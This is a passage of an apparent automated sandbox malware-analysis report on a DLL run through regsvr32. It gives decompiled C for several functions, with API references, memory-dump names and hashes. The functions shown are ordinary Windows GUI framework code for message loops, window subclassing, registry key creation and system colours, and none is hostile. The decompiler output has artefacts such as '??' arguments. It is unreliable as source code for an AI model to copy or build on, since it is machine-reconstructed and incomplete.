					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1000B911(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E100128D7(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1000A5E4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E100128D7(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

0x1000f6f2
0x1000f6fb
0x1000f703
0x1000f705
0x1000f709
0x1000f70d
0x1000f71b
0x1000f71b
0x1000f720
0x1000f726
0x1000f72a
0x1000f72e
0x1000f733
0x1000f739
0x1000f7b1
0x1000f7b1
0x1000f7b1
0x1000f7b5
0x00000000
0x00000000
0x1000f74d
0x1000f74f
0x1000f7b7
0x1000f7b7
0x1000f7b7
0x1000f7be
0x00000000
0x00000000
0x1000f7c2
0x1000f7c8
0x1000f7d0
0x1000f7dd
0x1000f7e5
0x1000f7e7
0x1000f7e7
0x1000f7d0
0x1000f7eb
0x1000f7ed
0x1000f7f3
0x1000f7f5
0x1000f830
0x1000f830
0x1000f830
0x00000000
0x1000f7f7
0x1000f7fb
0x1000f802
0x1000f803
0x1000f805
0x1000f80d
0x1000f80d
0x1000f821
0x00000000
0x1000f823
0x00000000
0x1000f823
0x1000f821
0x1000f7f5
0x1000f825
0x1000f826
0x00000000
0x1000f82b
0x1000f751
0x1000f753
0x1000f757
0x1000f759
0x1000f761
0x1000f763
0x1000f763
0x1000f763
0x1000f765
0x1000f76a
0x1000f76c
0x1000f770
0x1000f772
0x1000f776
0x1000f785
0x1000f785
0x1000f776
0x1000f770
0x1000f78b
0x1000f790
0x1000f7ad
0x1000f7ad
0x00000000
0x1000f792
0x1000f79f
0x1000f7a5
0x1000f7a9
0x1000f7ab
0x00000000
0x00000000
0x00000000
0x1000f7ab
0x1000f790
0x00000000

APIs

GetParent.USER32(?), ref: 1000F720
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F747
UpdateWindow.USER32(?), ref: 1000F761
SendMessageA.USER32 ref: 1000F785
SendMessageA.USER32 ref: 1000F79F
UpdateWindow.USER32(?), ref: 1000F7E5
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F819

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE8A, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E1000A7CE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10010DEC(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10057298;
						E10017C83( &_v28, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t37, _t46, _t51);
						_t43 = E10013965(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000CF71(_t43);
						}
						return E10017C60(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

0x1000ae8a
0x1000ae8a
0x1000ae8a
0x1000ae8f
0x1000aeaa
0x1000aeac
0x1000aeae
0x1000aeb9
0x1000aebf
0x1000aec1
0x1000aec3
0x1000aec4
0x100142c8
0x100142ca
0x100142cd
0x100142cf
0x100142f1
0x00000000
0x100142d1
0x100142d1
0x100142d6
0x100142d8
0x100142e9
0x100142e9
0x100142f0
0x100142f0
0x1000aec6
0x10014229
0x10014229
0x1001422a
0x1001422b
0x1001422c
0x1001422d
0x1001422e
0x10014232
0x10014238
0x1001423e
0x10014257
0x10014257
0x10014259
0x1001425b
0x00000000
0x00000000
0x1001424b
0x1001424d
0x1001424f
0x100142c1
0x100142c6
0x10014251
0x10014252
0x00000000
0x10014252
0x00000000
0x1001424f
0x1001425d
0x10014275
0x10014275
0x10014277
0x10014279
0x00000000
0x00000000
0x10014269
0x1001426b
0x1001426d
0x00000000
0x1001426f
0x10014270
0x00000000
0x10014270
0x00000000
0x1001426d
0x1001427b
0x1001427f
0x10014284
0x10014286
0x10014290
0x100142a7
0x100142a7
0x100142a9
0x100142ab
0x100142ac
0x00000000
0x00000000
0x1001429b
0x1001429d
0x1001429f
0x100142a2
0x00000000
0x100142a2
0x00000000
0x1001429f
0x100142bf
0x00000000
0x10014288
0x00000000
0x10014288
0x10014286
0x1000aeb0
0x1000a0db
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x1000ae91
0x1000ae91
0x1000ae96
0x00000000
0x1000ae9d
0x1000aea3
0x1000aea3
0x00000000

APIs

GetCapture.USER32 ref: 10014232
SendMessageA.USER32 ref: 1001424B
GetFocus.USER32 ref: 1001425D
SendMessageA.USER32 ref: 10014269
GetLastActivePopup.USER32(?), ref: 10014290
SendMessageA.USER32 ref: 1001429B
SendMessageA.USER32 ref: 100142BF

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC8A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FC8A(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1000B510();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E100174D0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000FBD6(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x1000fc93
0x1000fc9a
0x1000fca0
0x1000fca5
0x1000fcca
0x1000fcca
0x1000fcd0
0x1000fcd2
0x1000fcd2
0x1000fcd0
0x1000fcd5
0x1000fcda
0x1000fcde
0x1000fce1
0x1000fce1
0x1000fce4
0x1000fcec
0x1000fcf1
0x1000fcf1
0x1000fcf4
0x1000fcf8
0x1000fcfb
0x1000fd02
0x1000fd07
0x1000fd09
0x1000fd0d
0x1000fd17
0x1000fd1c
0x1000fd22
0x1000fd25
0x1000fd36
0x1000fd3d
0x1000fd40
0x1000fd40
0x1000fd0d
0x1000fd07
0x1000fd56
0x1000fd58
0x1000fd67
0x1000fd73
0x1000fd77
0x1000fd7f
0x1000fd7f
0x1000fd77
0x1000fd87
0x1000fd9a

APIs

_memset.LIBCMT ref: 1000FD17
SendMessageA.USER32 ref: 1000FD40
GetWindowLongA.USER32 ref: 1000FD52
GetWindowLongA.USER32 ref: 1000FD63
SetWindowLongA.USER32(?,000000FC,?), ref: 1000FD7F

Strings

(, xrefs: 1000FD36

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013E40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013E40(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10013e5b
0x10013e62
0x10013e65
0x10013e68
0x10013e6b
0x10013e76
0x10013ead
0x10013ead
0x10013eb8
0x10013ebd
0x10013ebd
0x10013ec2
0x10013ec7
0x10013ec7
0x10013ed0

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
RegCloseKey.ADVAPI32(?), ref: 10013EBD
RegCloseKey.ADVAPI32(?), ref: 10013EC7

Strings

software, xrefs: 10013E56

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10013CEE, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10013CEE(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E10017C83(0, 0);
				_t22 = E100134F9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10017C60(_t28);
			}

0x10013cee
0x10013cee
0x10013cee
0x10013cf5
0x10013cff
0x10013d0b
0x10013d11
0x10013d16
0x10013d1c
0x10013d1e
0x10013d23
0x10013d29
0x10013d29
0x10013d31
0x10013d42
0x10013d4e
0x10013d53
0x10013d59
0x10013d5c
0x10013d61
0x10013d6b
0x10013d6b
0x10013d6e
0x10013d74
0x10013d7f

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
__CxxThrowException@8.LIBCMT ref: 10013CFF

Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23

Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB

_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013810, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013810(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x1001381a
0x10013820
0x10013827
0x1001382e
0x10013835
0x10013842
0x10013849
0x1001384c
0x1001384f
0x10013853

APIs

GetSysColor.USER32(0000000F), ref: 1001381C
GetSysColor.USER32(00000010), ref: 10013823
GetSysColor.USER32(00000014), ref: 1001382A
GetSysColor.USER32(00000012), ref: 10013831
GetSysColor.USER32(00000006), ref: 10013838
GetSysColorBrush.USER32(0000000F), ref: 10013845
GetSysColorBrush.USER32(00000006), ref: 1001384C

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40

Uniqueness

Uniqueness Score: -1.00%

Function 10028DE5, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028DE5() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x1005acc4 = _t6;
					return _t6;
				}
			}

0x10028df6
0x10028e00
0x10028e04
0x10028e20
0x10028e20
0x00000000
0x10028e20
0x10028e06
0x10028e0c
0x00000000
0x00000000
0x00000000
0x10028e0e
0x10028e0e
0x10028e13
0x10028e19
0x00000000
0x10028e19

APIs

GetVersion.KERNEL32 ref: 10028DED
GetVersion.KERNEL32 ref: 10028DF8
GetVersion.KERNEL32 ref: 10028E00
GetVersion.KERNEL32 ref: 10028E06
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 10028E13

Strings

MSWHEEL_ROLLMSG, xrefs: 10028E0E

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000C209, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C209(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10057a08; // 0x7d1a16f8
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000C12A(0);
				_t67 = _t72;
				_t63 = E1000C15E(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
